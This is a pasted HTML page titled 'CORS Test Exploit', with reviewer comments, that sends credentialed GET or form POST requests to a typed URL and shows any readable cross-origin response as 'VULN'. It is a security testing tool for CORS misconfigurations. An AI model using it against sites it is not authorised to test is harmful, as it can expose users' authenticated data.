
Untitled

a guest Feb 20th, 2019 72 Never
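  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>CORS Test Exploit</title>
    <link rel="icon" href="https://issuetracker.google.com/img/favicon.ico">
    <!-- NOTE(review): this third-party stylesheet is loaded without Subresource
         Integrity. Serve a vendored copy, or add integrity and crossorigin
         attributes carrying the hash of the exact file that was reviewed. -->
    <link rel="stylesheet" href="https://bootswatch.com/4/lumen/bootstrap.css" media="screen">
  </head>
  <body>
    <main class="container mt-4">
      <div class="col-md-6 border mx-auto p-4">
        <h1 class="h3 text-center">CORS Test Exploit</h1>

        <!-- The former onkeypress/onkeyup handlers wiped every non-digit from a
             field as soon as it contained the word "document". That blacklist
             did not stop markup from reaching the result pane and it destroyed
             legitimate URLs such as /api/documents. It is gone: the result pane
             is now built from text nodes, so no input filter is needed. -->
        <label class="d-block" for="target">URL:</label>
        <input id="target" name="target" type="text" size="70" autocomplete="off">

        <label class="d-block mt-2" for="postdata">Post Data:</label>
        <input id="postdata" name="postdata" type="text" size="70" autocomplete="off">

        <!-- To switch between GET and POST, change which function the click
             listener at the bottom of the script is bound to. -->
        <div class="mt-4">
          <button class="btn btn-info" id="run" type="button">Exploit Now!</button>
        </div>
        <pre id="result" aria-live="polite"></pre>

        <script>
          // Appends `value` to `parent` as a text node (never parsed as HTML).
          function appendText(parent, value) {
            parent.appendChild(document.createTextNode(value));
          }

          // Appends `value` to `parent` wrapped in a <kbd> element.
          function appendKbd(parent, value) {
            var key = document.createElement("kbd");
            key.textContent = value;
            parent.appendChild(key);
          }

          // Replaces the content of #result with a plain-text note.
          function showNote(message) {
            var out = document.getElementById("result");
            out.textContent = "";
            appendText(out, "\n\n" + message);
          }

          // Renders the verdict for a finished request.
          //
          // The URL typed by the user and the body returned by the remote server
          // are both untrusted. They are written through text nodes and
          // textarea.value, so markup inside them is displayed, not executed in
          // this page (the original string-built innerHTML allowed that).
          //
          // The verdict is a heuristic: only HTTP 200 counts as "VULN". Every
          // other status, including 0 (read blocked by the browser, or a network
          // failure), is shown as "Not Vuln", which is not proof that the
          // endpoint's CORS policy is correct.
          function showResult(url, xhr) {
            var out = document.getElementById("result");
            out.textContent = "";
            appendText(out, "\n\nURL: " + url + "\n");

            if (xhr.status == 200) {
              appendText(out, "Response (Status : ");
              appendKbd(out, "VULN");
              appendText(out, " | status code : ");
              appendKbd(out, String(xhr.status));
              appendText(out, "):\n\n");

              var box = document.createElement("textarea");
              box.rows = 20;
              box.cols = 50;
              box.readOnly = true;
              box.value = xhr.responseText;
              out.appendChild(box);
            } else {
              appendText(out, "Response (status : ");
              appendKbd(out, "Not Vuln");
              appendText(out, ") : response tidak ada , status code ");
              appendKbd(out, String(xhr.status));
            }
          }

          // Reads and validates the target field.
          // Returns the trimmed URL, or null after showing a note when the value
          // cannot produce a meaningful cross-origin test:
          //   - empty or relative input would resolve against this page and be
          //     fetched same-origin, which always "succeeds";
          //   - a same-origin target says nothing about CORS either.
          function readTarget() {
            var raw = document.getElementsByName("target")[0].value.trim();
            var parsed;
            try {
              parsed = new URL(raw);
            } catch (e) {
              showNote("Enter an absolute http(s) URL.");
              return null;
            }
            if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
              showNote("Enter an absolute http(s) URL.");
              return null;
            }
            if (parsed.origin === window.location.origin) {
              showNote("Target has the same origin as this page; the result would say nothing about CORS.");
              return null;
            }
            return raw;
          }

          // Sends one request and renders the verdict once it has completed.
          //   method       "GET" or "POST"
          //   credentialed true to set withCredentials on the request
          //   payload      request body, or null
          function probe(method, credentialed, payload) {
            var url = readTarget();
            if (url === null) {
              return;
            }
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function () {
              // Judge only the finished request (readyState 4). The original
              // also rendered "Not Vuln" for every intermediate state.
              if (this.readyState !== 4) {
                return;
              }
              showResult(url, this);
            };
            xhttp.open(method, url, true);
            if (credentialed) {
              xhttp.withCredentials = true;
            }
            if (method === "POST") {
              xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            }
            xhttp.send(payload);
          }

          // Credentialed GET check against the URL in the "target" field.
          function get() {
            probe("GET", true, null);
          }

          // POST check: sends the "postdata" field as a form-encoded body.
          // NOTE(review): as in the original, this request does not set
          // withCredentials, so its verdict is not comparable to get()'s: a
          // "VULN" here only shows the response is readable cross-origin
          // without the user's cookies.
          function post() {
            var data = document.getElementsByName("postdata")[0].value;
            probe("POST", false, data);
          }

          // Bound here instead of an inline onclick attribute so the page can
          // run under a Content-Security-Policy that forbids inline handlers.
          document.getElementById("run").addEventListener("click", post);
        </script>
      </div>
    </main>
  </body>
  </html>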